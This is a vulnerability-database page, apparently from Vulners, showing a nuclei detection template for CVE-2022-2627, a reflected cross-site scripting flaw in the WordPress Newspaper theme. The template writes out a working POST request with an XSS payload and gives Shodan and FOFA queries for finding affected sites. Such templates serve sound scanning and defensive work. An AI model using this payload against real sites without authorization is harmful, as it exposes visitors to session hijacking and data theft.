Lucene search
K

WordPress Newspaper < 12 - Cross-Site Scripting

๐Ÿ—“๏ธย 07 Jul 2026ย 03:01:27Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 229ย Views

WordPress Newspaper theme < 12 - Cross-Site Scripting. Allows XSS via unsanitized parameter in AJAX action. Exploitation can lead to data theft or session hijackin

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-2627
31 Oct 202219:38
โ€“circl
CNNVD
WordPress theme Newspaper ่ทจ็ซ™่„šๆœฌๆผๆดž
31 Oct 202200:00
โ€“cnnvd
CVE
CVE-2022-2627
31 Oct 202200:00
โ€“cve
Cvelist
CVE-2022-2627 Newspaper < 12 - Reflected Cross-Site Scripting
31 Oct 202200:00
โ€“cvelist
NVD
CVE-2022-2627
31 Oct 202216:15
โ€“nvd
OSV
CVE-2022-2627
31 Oct 202216:15
โ€“osv
Patchstack
WordPress Newspaper premium theme <= 11.5.1 - Reflected Cross-Site Scripting (XSS) vulnerability
10 Oct 202200:00
โ€“patchstack
Prion
Cross site scripting
31 Oct 202216:15
โ€“prion
Positive Technologies
PT-2022-17756 ยท WordPress ยท Newspaper
31 Oct 202200:00
โ€“ptsecurity
RedhatCVE
CVE-2022-2627
23 May 202500:10
โ€“redhatcve
Rows per page
id: CVE-2022-2627

info:
  name: WordPress Newspaper < 12 - Cross-Site Scripting
  author: ramondunker,c4sper0
  severity: medium
  description: |
    WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: Fixed in version 12
  reference:
    - https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2627
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-2627
    cwe-id: CWE-79
    epss-score: 0.00969
    epss-percentile: 0.57605
    cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: tagdiv
    product: newspaper
    framework: wordpress
    shodan-query: http.html:/wp-content/themes/newspaper
    fofa-query: body=/wp-content/themes/newspaper
    publicwww-query:
      - "/wp-content/themes/Newspaper"
      - /wp-content/themes/newspaper
  tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=

    payloads:
      xss_payload:
        - "--><form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <form><math><img onerror=alert(document.domain) src=1><mtext>
          - td-block-
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ed370b2976619c26286ebe4c24feaadbcf9472c2c0520290041ebd13d9c3f1610221009d6a1daba3a26b7fe8e1cbd3fe500e2b84b0cadcc9c666b6690aa0cfdc4ab69c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.16.1
EPSS0.00969
SSVC
229